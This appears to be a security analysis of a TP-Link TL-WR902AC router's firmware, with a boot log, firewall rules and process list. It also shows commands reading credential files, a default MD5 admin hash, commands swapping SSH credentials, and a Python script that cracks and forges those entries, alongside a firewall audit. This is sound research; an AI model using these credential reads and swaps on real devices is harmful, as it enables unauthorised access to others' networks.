_ra_initWlan cmdmt7628_set_ed_cca: TURN OFF EDCCA  mac 0x10618 = 0xd7083f0f, EDCCA_Status=0
 is "iwpriv ra0 set ed_chk=0"
[ util_execSystem ] 141:  oal_wlan_ra_setStaNum cmd is "iwpriv ra0 set MaxStaNum=32"
[ util_execSystem ] 141:  oal_br_addIntfIntoBridge cmd device ra0 entered promiscuous mode
is "brctl addif br0: port 5(ra0) entering forwarding state
br0 ra0"

br0: port 5(ra0) entering forwarding state
[ util_execSystem ] 141:  oal_br_addIntfIntoBridge cmd is "brctldevice apcli0 entered promiscuous mode
 addif br0 apcli0"
[ util_execSystem ] 141:  oal_br_addIntfIntoBridge cmd is device ra1 entered promiscuous mode
"brctl addif br0 ra1"
[ util_execSystem ] 141:  oal_wlan_ra_initEnd cmspiflash_ioctl_read, Read from 0x007f0000 length 0x2, ret 0, retlen 0x2
d is "wlNetlinkTool &"
[ util_execSystem ] 141:  oal_wlan_ra_initEnd cmd is "killall -q wscd"

WLAN-Start wlNetlinkTool
Waiting for Wireless Events from interfaces...
swWlanChkAhbErr: netlink to do
[ util_execSystem ] 141:  oal_wlan_ra_initEnd cmd is "wscd -i ra0 -m 1 -w /var/tmp/wsc_upnp/ &"
[ util_execSystem ] 141:  rsl_initLanWlanObj cmd is "echo 0 > /proc/tplink/wl_mode"

[ oal_wlan_ra_loadDriver ] 2040:  no 5G chip.


[ rsl_initLanWlanObj ] 9419:  perror:1
wscd: SSDP UDP PORT = 1900
sendto: No such file or directory
pid 81 send 2030 error
sendto: No such file or directory
pid 81 send 2004 error
[ util_execSystem ] 141:  oal_startDhcps cmd is "dhcpd /var/tmp/dconf/udhcpd.conf"
[ util_execSystem ] 141:  oal_lan6_startDhcp6s cmd is "dhcp6s -c /var/tmp/dconf/dhcp6s_br0.conf -P /var/run/dhcp6s_br0.pid br0 &"

iptables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 141:  oal_lan6_startRadvd cmd is "radvd -C /var/tmp/dconf/radvd_br0.conf -p /var/run/radvd_br0.pid &"
[ util_execSystem ] 141:  oal_startSnmp cmd is "snmpd -f /var/tmp/dconf/snmpd.conf"

mldProxy# file: src/mld_ifinfo.c;line: 102; error = No such file or directory
mldProxy# Err: get LLA failed
[ rsl_initEwanObj ] 298: Initialize EWAN, enable(1)!
[ rsl_setEwanObj ] 208: Get Ethernet's stack!
[ rsl_setEwanObj ] 262: enable ethernet interface now!
[ oal_ewan_enable ] 458: pEwan->ifName(eth0.2)
[ util_execSystem ] 141:  oal_br_delIntfFromBridge cmd is "brctl delif br0 eth0.2"

brctl: bridge br0: Invalid argument
[ rsl_setEwanObj ] 268: EWAN.ifname(eth0.2)!
[ wan_conn_wanIpConn_getConnectionInfo ] 906: GET MAC(74:DA:88:FC:C3:AF) successfully!
[ util_execSystem ] 141:  oal_intf_setIfMac cmd is "ifconfig eth0.2 down"
[ util_execSystem ] 141:  oal_intf_setIfMac cmd is "ifconfig eth0.2 hw ether 74:DA:88:FC:C3:AF up"
[ util_execSystem ] 141:  oal_intf_enableIntf cmd is "ifconfig eth0.2 up"

[ rsl_initWanPppConnObj ] 398: into rsl_initWanPppConnObj!
[ rsl_initWanPppConnObj ] 515: rsl_initWanPppConnObj successed!
[ rsl_initWanPppConnObj ] 398: into rsl_initWanPppConnObj!
[ rsl_initWanPppConnObj ] 515: rsl_initWanPppConnObj successed!
radvd starting
[Jan 01 00:00:08] radvd: no linklocal address configured for br0
[Jan 01 00:00:08] radvd: error parsing or activating the config file: /var/tmp/dconf/radvd_br0.conf
[ rsl_initAppObj ] 1020:  ==> start dhcp client
[ util_execSystem ] 141:  oal_ipt_fwDdos cmd is "iptables -D FORWARD -j FIREWALL_DDOS
"

iptables: No chain/target/match by that name.
[ util_execSystem ] 141:  oal_ipt_forbidLanPing cmd is "iptables -t filter -D INPUT -i br+ -p icmp --icmp-type echo-request -j DROP
iptables -t filter -D FORWARD -i br+ -p icmp --icmp-type echo-request -j DROP
"

iptables: Bad rule (does a matching rule exist in that chain?).
iptables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 141:  oal_ddos_delPingRule cmd is "iptables -t filter -D INPUT ! -i br+ -p icmp --icmp-type echo-request -j ACCEPT
"

iptables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 141:  oal_ipt_setDDoSRules cmd is "iptables -F FIREWALL_DDOS"
[ util_execSystem ] 141:  ddos_clearAll cmd is "rm -f /var/tmp/dosHost"
[ util_execSystem ] 141:  oal_initFirewallObj cmd is "ebtables -N FIREWALL"
[ util_execSystem ] 141:  oal_initIp6FirewallObj cmd is "ip6tables -F"
[ util_execSystem ] 141:  oal_initIp6FirewallObj cmd is "ip6tables -X"
[ util_execSystem ] 141:  oal_initIp6FirewallObj cmd is "ip6tables -P INPUT ACCEPT"
[ util_execSystem ] 141:  oal_initIp6FirewallObj cmd is "ip6tables -P FORWARD DROP"
[ util_execSystem ] 141:  oal_initIp6FirewallObj cmd is "ip6tables -P OUTPUT ACCEPT"
[ util_execSystem ] 141:  oal_initIp6FirewallObj cmd is "ip6tables -N FIREWALL"
[ util_execSystem ] 141:  oal_initIp6FirewallObj cmd is "ip6tables -N FWRULE"
[ util_execSystem ] 141:  oal_initIp6FirewallObj cmd is "ip6tables -N SETMSS"
[ util_execSystem ] 141:  oal_initIp6FirewallObj cmd is "ip6tables -A INPUT -i lo -p ALL -j ACCEPT -m comment                                --comment "loop back""
[ util_execSystem ] 141:  oal_initIp6FirewallObj cmd is "ip6tables -A INPUT  -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT"
[ util_execSystem ] 141:  oal_initIp6FirewallObj cmd is "ip6tables -A INPUT -i br+ -p tcp --dport 23 -j ACCEPT"
[ util_execSystem ] 141:  oal_initIp6FirewallObj cmd is "ip6tables -A INPUT -p tcp --dport 23 -j DROP"
[ util_execSystem ] 141:  oal_initIp6FirewallObj cmd is "ip6tables -A INPUT -i br+ -p tcp --dport 22 -j ACCEPT"
[ util_execSystem ] 141:  oal_initIp6FirewallObj cmd is "ip6tables -A INPUT -p tcp --dport 22 -j DROP"
[ util_execSystem ] 141:  oal_initIp6FirewallObj cmd is "ip6tables -A INPUT -i br+ -p icmpv6 --icmpv6-type echo-request -j ACCEPT"
[ util_execSystem ] 141:  oal_initIp6FirewallObj cmd is "ip6tables -A INPUT -p icmpv6 --icmpv6-type echo-request -j DROP"
[ util_execSystem ] 141:  oal_initIp6FirewallObj cmd is "ip6tables -A FORWARD -i br+ -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT"
[ util_execSystem ] 141:  oal_initIp6FirewallObj cmd is "ip6tables -A FORWARD -o br+ -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT"
[ util_execSystem ] 141:  oal_initIp6FirewallObj cmd is "ip6tables -A FORWARD -j FIREWALL"
[ util_execSystem ] 141:  oal_initIp6FirewallObj cmd is "ip6tables -I FORWARD 1 -j SETMSS"
[ util_execSystem ] 141:  oal_fw6_setFwEnabeld cmd is "ip6tables -D FIREWALL -j ACCEPT"

ip6tables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 141:  oal_fw6_setFwEnabeld cmd is "ip6tables -F FIREWALL"
[ util_execSystem ] 141:  oal_fw6_setFwEnabeld cmd is "ip6tables -A FIREWALL -j ACCEPT"

[ rsl_initWanL2tpConnObj ] 245: L2TP Connection(ewan_l2tp) is not enable.

[ rsl_initWanL2tpConnObj ] 245: L2TP Connection() is not enable.

[ rsl_initWanPptpConnObj ] 239: PPTP Connection(ewan_pptp) is not enable.

[ rsl_initWanPptpConnObj ] 239: PPTP Connection() is not enable.
[ util_execSystem ] 141:  setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/netfilter/nf_conntrack_ftp.ko"
[ util_execSystem ] 141:  setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/ipv4/netfilter/nf_nat_ftp.ko"
[ util_execSystem ] 141:  oal_openAlg cmd is "iptables -D FORWARD_VPN_PASSTHROUGH  -p udp --dport 500 -j DROP"

iptables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 141:  setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/ipv4/netfilter/nf_nat_proto_gre.ko"
[ util_execSystem ] 141:  setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/ipv4/netfilter/nf_nat_pptp.ko"
[ util_execSystem ] 141:  oal_openAlg cmd is "iptables -D FORWARD_VPN_PASSTHROUGH  -p tcp --dport 1723 -j DROP"

iptables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 141:  oal_openAlg cmd is "iptables -D FORWARD_VPN_PASSTHROUGH  -p udp --dport 1701 -j DROP"

iptables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 141:  setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/netfilter/nf_conntrack_tftp.ko"
[ util_execSystem ] 141:  setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/ipv4/netfilter/nf_nat_tftp.ko"
[ util_execSystem ] 141:  setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/netfilter/nf_conntrack_h323.ko"
[ util_execSystem ] 141:  setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/ipv4/netfilter/nf_nat_h323.ko"
[ util_execSystem ] 141:  setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/netfilter/nf_conntrack_sip.ko"
[ util_execSystem ] 141:  setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/ipv4/netfilter/nf_nat_sip.ko"
[ util_execSystem ] 141:  setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/netfilter/nf_conntrack_rtsp.ko"
[ util_execSystem ] 141:  setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/ipv4/netfilter/nf_nat_rtsp.ko"

nf_nat_rtsp v0.6.21 loading
enable switch phyport...
Set: phy[0].reg[0] = 3900
Set: phy[1].reg[0] = 3900
Set: phy[2].reg[0] = 3900
Set: phy[3].reg[0] = 3900
Set: phy[4].reg[0] = 3900
[cmd_dutInit():1081] init shm
[tddp_taskEntry():151] tddp task start
Set: phy[0].reg[0] = 3300
Set: phy[1].reg[0] = 3300
Set: phy[2].reg[0] = 3300
Set: phy[3].reg[0] = 3300
Set: phy[4].reg[0] = 3300
resetMiiPortV over.
Set: phy[0].reg[4] = 01e1
Set: phy[0].reg[0] = 3300
Set: phy[1].reg[4] = 01e1
Set: phy[1].reg[0] = 3300
Set: phy[2].reg[4] = 01e1
Set: phy[2].reg[0] = 3300
Set: phy[3].reg[4] = 01e1
Set: phy[3].reg[0] = 3300
Set: phy[4].reg[4] = 01e1
Set: phy[4].reg[0] = 3300
turn off flow control over.
[ util_execSystem ] 141:  prepareDropbear cmd is "dropbearkey -t rsa -f /var/tmp/dropbear/dropbear_rsa_host_key"

Will output 1024 bit rsa secret key to '/var/tmp/dropbear/dropbear_rsa_host_key'
Generating key, this may take a while...
[ util_execSystem ] 141:  prepareDropbear cmd is "dropbearkey -t dss -f /var/tmp/dropbear/dropbear_dss_host_key"

Will output 1024 bit dss secret key to '/var/tmp/dropbear/dropbear_dss_host_key'
Generating key, this may take a while...

Live Analysis

TL-WR902AC: Firmware 170828

Available tools

arping          dropbear        iwconfig        pppd            tdpd
ash             dropbearkey     iwlist          ps              tftp
ated_tp         dropbearmulti   iwpriv          pwdog           tmpd
bpalogin        dyndns          kill            radvd           top
brctl           ebtables        killall         reboot          traceroute
busybox         echo            login           reg             umount
cat             free            ls              ripd            upnpd
chat            getty           lsmod           rm              usb_modeswitch
chmod           halt            mii_mgr         rmmod           usbp
cli             handle_card     mii_mgr_cl45    route           ushare
cmxdns          hotplug         mkdir           rt2860apd       vconfig
config-mii.sh   httpd           mldProxy        rtinicapd       vsftpd
cos             ifconfig        modem_scan      scp             wanType
cp              igmpd           mount           sh              wlNetlinkTool
date            init            netstat         sleep           wscd
df              insmod          noipdns         smbcontrol      wscd_5G
dhcp6c          ip              ntfs-3g         smbd            xl2tpd
dhcp6s          ip6tables       ntpc            smbpasswd       xtables-multi
dhcpc           ipcrm           pidof           switch          zebra
dhcpd           ipcs            ping            taskset
diagTool        ipping          ping6           tc
dnsProxy        iptables        poweroff        tddp

Mounted filesystems

rootfs on / type rootfs (rw)
/dev/root on / type squashfs (ro,relatime)
proc on /proc type proc (rw,relatime)
ramfs on /var type ramfs (rw,relatime)
devpts on /dev/pts type devpts (rw,relatime,mode=600)
/sys on /sys type sysfs (rw,relatime)
usbfs on /proc/bus/usb type usbfs (rw,relatime)

Service configuration

# echo $USER
root

# cat /etc/passwd
admin:$1$$iC.dUsGpxNNJGeOm1dFio/:0:0:root:/:/bin/sh
dropbear:x:500:500:dropbear:/var/tmp/dropbear:/bin/sh
nobody:*:99:99:nobody:/:/bin/sh
guest:*:0:0:guest:/var/usbdisk/:/bin/sh

# cat /var/passwd
admin:$1$$iC.dUsGpxNNJGeOm1dFio/:0:0:root:/:/bin/sh
dropbear:x:500:500:dropbear:/var/tmp/dropbear:/bin/sh
nobody:*:99:99:nobody:/:/bin/sh
guest:*:0:0:guest:/var/usbdisk/:/bin/sh

# cat /etc/vsftpd_passwd
admin:1234:1:1;guest:guest:0:0;test:test:1:1;$

# cat /etc/vsftpd.conf
anonymous_enable=NO
local_enable=YES
write_enable=YES
connect_from_port_20=YES
ascii_upload_enable=YES
ascii_download_enable=YES
listen=YES
chroot_local_user=YES
max_clients=2
ftpd_banner=Welcome to TP-LINK FTP server
pasv_min_port=50000
pasv_max_port=60000

# ls /var/tmp/dropbear/
dropbear_dss_host_key  dropbear_rsa_host_key  dropbearpwd
# cat /var/tmp/dropbear/dropbearpwd
username:admin
password:21232f297a57a5a743894a0e4a801fc3    <-- MD5("admin")

# Extracted from the Bootlog
# prepareDropbear cmd is "dropbearkey -t rsa -f /var/tmp/dropbear/dropbear_rsa_host_key"
# Will output 1024 bit rsa secret key to '/var/tmp/dropbear/dropbear_rsa_host_key'
# prepareDropbear cmd is "dropbearkey -t dss -f /var/tmp/dropbear/dropbear_dss_host_key"
# Will output 1024 bit dss secret key to '/var/tmp/dropbear/dropbear_dss_host_key'
# prepareDropbear cmd is "dropbear -p 22 -r /var/tmp/dropbear/dropbear_rsa_host_key -d /var/tmp/dropbear/dropbear_dss_host_key -A /var/tmp/dropbear/dropbearpwd"
Because /var is a writable ramfs (see the mounted filesystems above) while the root filesystem is a read-only squashfs, the SSH credentials can be changed at runtime: dropbearpwd holds one username and the unsalted MD5 of its password, so a different user is created by writing the two lines with echo, and a second dropbear instance can be started on another port reusing the generated host keys. The passwd copy in /var can be edited the same way. Two caveats: a ramfs does not survive a reboot, so none of these changes are persistent, and the stored hash is the unsalted MD5 of the default password (MD5("admin") above), which any hash lookup resolves immediately. Note also that admin and guest both map to UID 0 (guest and nobody have a locked password field, *), and that vsftpd_passwd keeps its passwords in plaintext.
~ # cd /var/tmp/dropbear/
/var/tmp/dropbear # cat dropbearpwd
username:admin
password:21232f297a57a5a743894a0e4a801fc3
/var/tmp/dropbear # cp dropbearpwd dropbearpwd.bak
/var/tmp/dropbear # echo "username:test" > dropbearpwd
/var/tmp/dropbear # echo "password:21232f297a57a5a743894a0e4a801fc3" >> dropbearpwd
/var/tmp/dropbear # cat dropbearpwd
username:test
password:21232f297a57a5a743894a0e4a801fc3

# Start a new Dropbear instance
dropbear -p 2222 -r /var/tmp/dropbear/dropbear_rsa_host_key
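
The two credential stores above can be checked offline. The following Python script is an added example (not part of the original examination or of TP-Link's code): it parses the dropbearpwd and vsftpd_passwd formats exactly as they appear above, runs the dropbear hash against a small constructed candidate list (unsalted MD5 needs one hash per guess), and builds a replacement dropbearpwd entry in the same format. The meaning of the two numeric fields in vsftpd_passwd is not documented here and is treated as opaque; the candidate list is constructed for the demonstration.

```python
import hashlib

# Constructed sample inputs, copied verbatim from the files listed above.
DROPBEARPWD = "username:admin\npassword:21232f297a57a5a743894a0e4a801fc3\n"
VSFTPD_PASSWD = "admin:1234:1:1;guest:guest:0:0;test:test:1:1;$"

# Constructed candidate list for the demonstration; a real audit would use a
# full wordlist or a precomputed MD5 lookup.
CANDIDATES = ["password", "1234", "admin", "tplink"]


def parse_dropbearpwd(text):
    """dropbearpwd is 'key:value' per line: one username and one MD5 hex digest."""
    creds = {}
    for line in text.splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            creds[key.strip()] = value.strip()
    return creds


def crack_md5(hexdigest, candidates):
    """Unsalted MD5 means one hash per guess and no per-user work factor."""
    target = hexdigest.lower()
    for word in candidates:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None


def parse_vsftpd_passwd(text):
    """Records are ';'-separated, fields ':'-separated, the list ends with '$'.
    The password field is plaintext; the two trailing numeric fields are not
    documented on this page and are kept as opaque flags (assumption)."""
    users = []
    for record in text.split(";"):
        record = record.strip()
        if not record or record == "$":
            continue
        name, password, flag_a, flag_b = record.split(":")
        users.append({"user": name, "password": password, "flags": (flag_a, flag_b)})
    return users


def dropbearpwd_entry(username, password):
    """Build a replacement dropbearpwd in the same format (unsalted MD5)."""
    digest = hashlib.md5(password.encode()).hexdigest()
    return f"username:{username}\npassword:{digest}\n"


def audit(dropbearpwd=DROPBEARPWD, vsftpd_passwd=VSFTPD_PASSWD, candidates=CANDIDATES):
    """Summarise what read access to /var reveals from both files."""
    ssh = parse_dropbearpwd(dropbearpwd)
    return {
        "ssh": (ssh.get("username"), crack_md5(ssh.get("password", ""), candidates)),
        "ftp": [(u["user"], u["password"]) for u in parse_vsftpd_passwd(vsftpd_passwd)],
    }


if __name__ == "__main__":
    print(audit())
    print(dropbearpwd_entry("test", "admin"), end="")
```

The output of dropbearpwd_entry("test", "admin") is exactly the file written with the two echo commands above, which is why the swapped-in user keeps the admin password.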

Default iptables

# cat /var/tmp/dconf/rc.router
#!/bin/sh

#delete old rules
/etc/iptables-stop

#enable ip forward
echo "1" > /proc/sys/net/ipv4/ip_forward
/etc/iptables-stop

#set policy
iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -P OUTPUT ACCEPT
iptables -t nat -P PREROUTING ACCEPT
iptables -t nat -P POSTROUTING ACCEPT
iptables -t nat -P OUTPUT ACCEPT

iptables -N CTL
iptables -N FORWARD_DMZ
iptables -N FORWARD_UPNP
iptables -N FORWARD_UPNP_SECCONN
iptables -N FORWARD_PT
iptables -N FORWARD_VS
iptables -N FORWARD_VPN_PASSTHROUGH
iptables -N PARENTCTL
iptables -N PCRULE
iptables -N PCDROP
iptables -N FIREWALL
iptables -N FIREWALL_DDOS
iptables -N FWRULE
iptables -N FWD_MARK_LAN
iptables -N FWD_MARK_WAN
iptables -N OUTPUT_MARK_LOCAL
iptables -N BRIDGE_ISOLATION
iptables -t nat -N PREROUTING_DMZ

iptables -t nat -N PREROUTING_UPNP
iptables -t nat -N PREROUTING_UPNP_SECCONN
iptables -t nat -N PREROUTING_PT
iptables -t nat -N PREROUTING_VS
iptables -t nat -N POSTROUTING_NATLOOPBACK_VS
iptables -t nat -N POSTROUTING_NATLOOPBACK_UPNP
iptables -t nat -N NATLOOPBACK_UPNP_SECCONN
iptables -t nat -N POSTROUTING_NATLOOPBACK_DMZ
iptables -I OUTPUT -j OUTPUT_MARK_LOCAL
iptables -t filter -A FORWARD -o br+ -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -j CTL
iptables -t filter -A FORWARD -i br+ -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD ! -i br+ -j FORWARD_VS
iptables -A FORWARD -j FORWARD_PT
iptables -A FORWARD ! -i br+ -j FORWARD_UPNP
iptables -A FORWARD ! -i br+ -j FORWARD_UPNP_SECCONN
iptables -A FORWARD ! -i br+ -j FORWARD_DMZ
iptables -A FORWARD -j FORWARD_VPN_PASSTHROUGH
iptables -t nat -A PREROUTING ! -i br+ -d 255.255.255.255 -p udp --sport 67 --dport 68 -j ACCEPT
iptables -t nat -A PREROUTING -d 224.0.0.0/4 -j ACCEPT
iptables -t nat -A PREROUTING -j PREROUTING_VS
iptables -t nat -A PREROUTING -j PREROUTING_PT
iptables -t nat -A PREROUTING -j PREROUTING_UPNP
iptables -t nat -A PREROUTING -j PREROUTING_UPNP_SECCONN
iptables -t nat -A POSTROUTING -j POSTROUTING_NATLOOPBACK_VS
iptables -t nat -A POSTROUTING -j POSTROUTING_NATLOOPBACK_UPNP
iptables -t nat -A POSTROUTING -j NATLOOPBACK_UPNP_SECCONN
iptables -t nat -A POSTROUTING -j POSTROUTING_NATLOOPBACK_DMZ
iptables -t nat -A PREROUTING -j PREROUTING_DMZ

iptables -t filter -A FORWARD -i br+ -j ACCEPT
iptables -t filter -A FORWARD -d 224.0.0.0/4 -j ACCEPT
iptables -t filter -A INPUT -i lo -p ALL -j ACCEPT              -m comment --comment "loop back"
iptables -t filter -A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
iptables -t filter -A INPUT -d 224.0.0.0/4 -j ACCEPT
iptables -A INPUT -p udp ! -i br+ --sport 67 --dport 68 -j ACCEPT
iptables -A INPUT -p udp --dport 161 -j ACCEPT
# iptables -nvL
Chain INPUT (policy DROP 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination
   12  4449 ACCEPT     all  --  lo     *       0.0.0.0/0            0.0.0.0/0            /* loop back */
 2316  206K ACCEPT     all  --  *      *       0.0.0.0/0            0.0.0.0/0            ctstate RELATED,ESTABLISHED
   26  4240 ACCEPT     all  --  *      *       0.0.0.0/0            224.0.0.0/4
    0     0 ACCEPT     udp  --  !br+   *       0.0.0.0/0            0.0.0.0/0            udp spt:67 dpt:68
    0     0 ACCEPT     udp  --  *      *       0.0.0.0/0            0.0.0.0/0            udp dpt:161
  216 14556 ACCEPT     all  --  br+    *       0.0.0.0/0            0.0.0.0/0

Chain FORWARD (policy DROP 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination
    0     0 ACCEPT     all  --  *      br+     0.0.0.0/0            0.0.0.0/0            ctstate RELATED,ESTABLISHED
    0     0 CTL        all  --  *      *       0.0.0.0/0            0.0.0.0/0
    0     0 ACCEPT     all  --  br+    *       0.0.0.0/0            0.0.0.0/0            ctstate RELATED,ESTABLISHED
    0     0 FORWARD_VS  all  --  !br+   *       0.0.0.0/0            0.0.0.0/0
    0     0 FORWARD_PT  all  --  *      *       0.0.0.0/0            0.0.0.0/0
    0     0 FORWARD_UPNP  all  --  !br+   *       0.0.0.0/0            0.0.0.0/0
    0     0 FORWARD_UPNP_SECCONN  all  --  !br+   *       0.0.0.0/0            0.0.0.0/0
    0     0 FORWARD_DMZ  all  --  !br+   *       0.0.0.0/0            0.0.0.0/0
    0     0 FORWARD_VPN_PASSTHROUGH  all  --  *      *       0.0.0.0/0            0.0.0.0/0
    0     0 ACCEPT     all  --  br+    *       0.0.0.0/0            0.0.0.0/0
    0     0 ACCEPT     all  --  *      *       0.0.0.0/0            224.0.0.0/4

Chain OUTPUT (policy ACCEPT 1954 packets, 3746K bytes)
 pkts bytes target     prot opt in     out     source               destination
 1981 3755K OUTPUT_MARK_LOCAL  all  --  *      *       0.0.0.0/0            0.0.0.0/0

Chain BRIDGE_ISOLATION (0 references)
 pkts bytes target     prot opt in     out     source               destination

Chain CTL (1 references)
 pkts bytes target     prot opt in     out     source               destination

Chain FIREWALL (0 references)
 pkts bytes target     prot opt in     out     source               destination

Chain FIREWALL_DDOS (0 references)
 pkts bytes target     prot opt in     out     source               destination

Chain FORWARD_DMZ (1 references)
 pkts bytes target     prot opt in     out     source               destination

Chain FORWARD_PT (1 references)
 pkts bytes target     prot opt in     out     source               destination

Chain FORWARD_UPNP (1 references)
 pkts bytes target     prot opt in     out     source               destination

Chain FORWARD_UPNP_SECCONN (1 references)
 pkts bytes target     prot opt in     out     source               destination

Chain FORWARD_VPN_PASSTHROUGH (1 references)
 pkts bytes target     prot opt in     out     source               destination

Chain FORWARD_VS (1 references)
 pkts bytes target     prot opt in     out     source               destination

Chain FWD_MARK_LAN (0 references)
 pkts bytes target     prot opt in     out     source               destination

Chain FWD_MARK_WAN (0 references)
 pkts bytes target     prot opt in     out     source               destination

Chain FWRULE (0 references)
 pkts bytes target     prot opt in     out     source               destination

Chain OUTPUT_MARK_LOCAL (1 references)
 pkts bytes target     prot opt in     out     source               destination

Chain PARENTCTL (0 references)
 pkts bytes target     prot opt in     out     source               destination

Chain PCDROP (0 references)
 pkts bytes target     prot opt in     out     source               destination

Chain PCRULE (0 references)
 pkts bytes target     prot opt in     out     source               destination
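
To make the ruleset above reviewable without reading it by hand, the following Python script (an added example, not part of the original page) parses `iptables -nvL` output and lists the INPUT rules that a packet arriving on a non-LAN interface can still hit. The sample is the INPUT chain copied from the listing above plus the start of the FORWARD chain; treating lo and br+ as the only LAN-side interfaces is an assumption taken from the bridge setup in the boot log.

```python
import re

# Constructed sample: the INPUT chain and the head of the FORWARD chain, copied
# from the router's `iptables -nvL` output shown above.
IPTABLES_NVL = """\
Chain INPUT (policy DROP 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination
   12  4449 ACCEPT     all  --  lo     *       0.0.0.0/0            0.0.0.0/0            /* loop back */
 2316  206K ACCEPT     all  --  *      *       0.0.0.0/0            0.0.0.0/0            ctstate RELATED,ESTABLISHED
   26  4240 ACCEPT     all  --  *      *       0.0.0.0/0            224.0.0.0/4
    0     0 ACCEPT     udp  --  !br+   *       0.0.0.0/0            0.0.0.0/0            udp spt:67 dpt:68
    0     0 ACCEPT     udp  --  *      *       0.0.0.0/0            0.0.0.0/0            udp dpt:161
  216 14556 ACCEPT     all  --  br+    *       0.0.0.0/0            0.0.0.0/0

Chain FORWARD (policy DROP 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination
    0     0 ACCEPT     all  --  *      br+     0.0.0.0/0            0.0.0.0/0            ctstate RELATED,ESTABLISHED
    0     0 CTL        all  --  *      *       0.0.0.0/0            0.0.0.0/0
"""

# Assumption: the LAN side is the bridge br0 (matched by br+) and loopback;
# everything else (eth0.2, the apcli* uplinks) is treated as untrusted.
LAN_IFACES = {"lo", "br+"}


def parse_iptables_nvl(text):
    """Parse `iptables -nvL` into {chain: {"policy": str|None, "rules": [dict, ...]}}."""
    chains, current = {}, None
    for line in text.splitlines():
        m = re.match(r"Chain (\S+) \((?:policy (\S+)|\d+ references)", line)
        if m:
            current = m.group(1)
            chains[current] = {"policy": m.group(2), "rules": []}
            continue
        if current is None or not line.strip() or line.lstrip().startswith("pkts"):
            continue
        f = line.split()
        # columns: pkts bytes target prot opt in out source destination [match ...]
        chains[current]["rules"].append({
            "pkts": f[0], "target": f[2], "prot": f[3], "in": f[5], "out": f[6],
            "src": f[7], "dst": f[8], "match": " ".join(f[9:]),
        })
    return chains


def wan_reachable_input(chains):
    """ACCEPT rules in INPUT that a packet from a non-LAN interface can match.

    Stateful RELATED,ESTABLISHED rules are skipped: they only admit replies to
    connections the router opened itself, not new inbound connections."""
    hits = []
    for rule in chains["INPUT"]["rules"]:
        if rule["target"] != "ACCEPT" or "ctstate" in rule["match"]:
            continue
        if rule["in"] in LAN_IFACES:
            continue  # restricted to loopback or the LAN bridge
        hits.append(rule)
    return hits


def describe(rule):
    """One-line summary used for the report."""
    what = rule["match"] or f"{rule['prot']} to {rule['dst']}"
    return f"in={rule['in']:<5} {what}"


if __name__ == "__main__":
    chains = parse_iptables_nvl(IPTABLES_NVL)
    print("INPUT policy:", chains["INPUT"]["policy"])
    for rule in wan_reachable_input(chains):
        print("  reachable from non-LAN:", describe(rule))
```

On the sample the report lists three rules: multicast destinations, DHCP replies on the WAN side (needed by the dhcpc client), and UDP/161 from anywhere. The first two are expected for a router; the third is the one to follow up against the process list and a UDP socket listing.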

Two points in this ruleset deserve attention. The last INPUT rule (iptables -A INPUT -i br+ -j ACCEPT) admits anything arriving on the bridge, and the boot log above adds the guest SSID interface ra1 to the same bridge br0 while the BRIDGE_ISOLATION chain is never referenced; unless ebtables rules not captured here separate the guest network, guest clients can reach every service listed under open ports. The udp dpt:161 rule carries no interface match, so SNMP would be accepted from the WAN side as well; snmpd is started in the boot log but does not appear in the process list below, and no /proc/net/udp listing was taken, so its reachability was not confirmed.

Running processes

  PID USER       VSZ STAT COMMAND
    1 admin     1068 S    init
    2 admin        0 SW   [kthreadd]
    3 admin        0 SW   [ksoftirqd/0]
    4 admin        0 SW   [kworker/0:0]
    5 admin        0 SW   [kworker/u:0]
    6 admin        0 SW<  [khelper]
    7 admin        0 SW   [kworker/u:1]
   44 admin        0 SW   [sync_supers]
   46 admin        0 SW   [bdi-default]
   48 admin        0 SW<  [kblockd]
   79 admin        0 SW   [kswapd0]
   81 admin        0 SW<  [crypto]
  642 admin        0 SW   [mtdblock0]
  647 admin        0 SW   [mtdblock1]
  652 admin        0 SW   [mtdblock2]
  657 admin        0 SW   [mtdblock3]
  662 admin        0 SW   [mtdblock4]
  667 admin        0 SW   [mtdblock5]
  672 admin        0 SW   [mtdblock6]
  690 admin        0 SW   [kworker/0:1]
  731 admin        0 SW   [khubd]
  777 admin     3132 S    cos
  778 admin     1068 S    /bin/sh
  867 admin     2300 S    igmpd
  870 admin     2320 S    mldProxy
  871 admin     3132 S    cos
  872 admin     3132 S    cos
  873 admin     3132 S    cos
  876 admin     2264 S    ntpc
  880 admin     2272 S    dyndns /var/tmp/dconf/dyndns.conf
  883 admin     2272 S    noipdns /var/tmp/dconf/noipdns.conf
  886 admin     2272 S    cmxdns /var/tmp/dconf/cmxdns.conf
  982 admin        0 SW   [RtmpCmdQTask]
  983 admin        0 SW   [RtmpWscTask]
  984 admin        0 SW   [RtmpMlmeTask]
  997 admin     1244 S    wlNetlinkTool
